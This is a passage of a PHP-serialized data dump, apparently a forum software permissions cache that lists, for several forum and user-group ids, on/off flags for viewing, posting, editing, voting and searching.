osts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"221\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"292\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"606\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"649\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"765\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:48;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"682\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"683\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"687\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:3;a:18:{s:3:\"pid\";s:3:\"684\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"3\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"685\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"686\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"688\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"689\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"690\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"691\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"692\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"694\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"774\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:19;a:15:{i:1;a:18:{s:3:\"pid\";s:3:\"622\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"623\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"629\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:3;a:18:{s:3:\"pid\";s:3:\"624\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"3\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:4;a:18:{s:3:\"pid\";s:3:\"625\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"4\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"626\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"627\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"628\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"630\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"631\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"632\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"633\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"634\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"650\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"766\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:83;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"810\";s:3:\"fid\";s:2:\"83\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:64;a:8:{i:5;a:18:{s:3:\"pid\";s:3:\"816\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"817\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"818\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s